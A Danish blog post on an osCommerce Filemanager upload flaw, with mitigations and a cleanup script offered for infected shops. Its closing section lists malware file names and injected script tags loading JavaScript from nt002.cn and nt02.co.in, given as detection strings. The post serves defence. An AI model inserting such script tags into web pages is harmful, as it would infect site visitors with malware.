osCommerce filemanager exploit

Hvis du arbejder med, eller selv har en e-shop med osCommerce, har du måske eller måske ikke hørt om at der er en ret så fatal fejl i deres Filemanager. Fejlen består i at man uden at være logget ind i admin, kan udnytte Filemanager’en til at uploade hvilken som helst fil til serveren. Du kan læse mere om fejlen på deres forum.

 

Af løsninger til at undgå at Filemanager’en bliver udnyttet, er der:

  • Omdøb din “catalog/admin” mappe
  • Beskyt din “catalog/admin” mappe med .htaccess
  • Fjern “filemanager.php”

 

Men !

Hvis din Filemanager allerede er blevet udnyttet, er der en god chance for at der ligger malware og roder på dit site, og hvis Google endnu ikke har gjort det, vil den bliver markeret som et site der spreder malware, og dine besøgende vil blive præsenteret med en advarsel om at sitet er markeret som et site der spreder malware, hvis dine besøgendes browser altså understøtter det.

 

Så vidt jeg har testet mig frem til så understøtter Mozilla Firefox og Google Chrome denne feature med at advare dig, hvorimod Internet Explorer går ind på siden som normalt.

 

Men du kan altid bruge linket herunder til at teste om Google har registreret dit site i deres “Safe Browsing” register:

http://www.google.com/safebrowsing/diagnostic?site=http://dit-site.dk/

 

Eksempelvis kan du teste mit site på følgende link: Test mit site i Google “Safe Browsing” register

 

Da jeg for nyligt selv fik til opgave at rydde op på et inficeret site, fik jeg bygget et script til at søge igennem alle filer i en mapper samt undermapper efter filer der er inficeret, eller selve de filer der er uploaded til at inficere.

Hvis du har fundet ud af at der er malware på dit site, eller du bare er nysgerrig, skal du være noget så velkommen til at hente filen herunder, og jeg vil meget gerne høre om det hvis du har forbedringer/rettelser/kommentarer til den.

osCommerce Filemanager – Exploit Remover

Jeg var nød til at fjerne nedenstående liste over malware filer og koder fra PHP-filen, da mit antivirus program fanger dem når jeg selv prøver at downloade filen 😛 De skal blot tilføjes til de array’s du finder i toppen af “osc_FER.php”-filen.

 

Indtil videre har jeg registreret følgende malware filer:

  • g00gle91673bb9a0a3a.php
  • goog1e91673bb9a0a3a.php
  • google91673bb9a0a3a.php

 

Og følgende malware koder:

  • <script src=”http://nt002.cn/E/J.JS”></script>
  • <script src=’http://nt002.cn/E/J.JS’></script>
  • <script src=”http://nt02.co.in/3″></script>
  • <script src=’http://nt02.co.in/3′></script>

Skriv et svar

Din e-mailadresse vil ikke blive publiceret. Krævede felter er markeret med *

This site uses Akismet to reduce spam. Learn how your comment data is processed.